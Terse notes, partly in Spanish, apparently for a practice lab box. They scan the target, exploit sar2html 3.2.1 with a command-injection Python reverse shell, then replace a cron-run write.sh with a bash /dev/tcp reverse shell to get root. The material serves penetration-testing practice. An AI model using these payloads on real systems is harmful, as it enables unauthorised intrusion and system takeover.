nmap -A -p- -oA sar 192.168.152.35 --min-rate=10000 --script=vuln --script-timeout=15 -v
nmap -sC -sV -O -p- -oA sar 192.168.152.35
nmap -sU -O -p- -oA sar-udp 192.168.152.35
nikto -h 192.168.152.35:80
nmap -sCV -p80,443 192.168.152.35 -oN targeted
whatweb http://192.168.152.35
http://192.168.152.35
http://192.168.152.35/root.txt
searchsploit sar2html 3.2.1
http://192.168.152.35/sar2HTML/index.php?plot=;python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.152",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Vamos a esta direccion de arriba
nc -lvnp 443
python3 -m http.server 80
cd /tmp
wget http://192.168.49.152/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
Vemos que se corre un script llamado write.sh
![[Pasted image 20210915181500.png]]
Borramos el archivo write.sh y creamos uno nuevo.
#!/bin/bash
bash -i >& /dev/tcp/192.168.49.52/443 0>&1
Hacemos un nuevo script
python3 -m http.server 8888
wget http://192.168.49.152:8888/write.sh
chmod 777 write.sh
nc -lvnp 443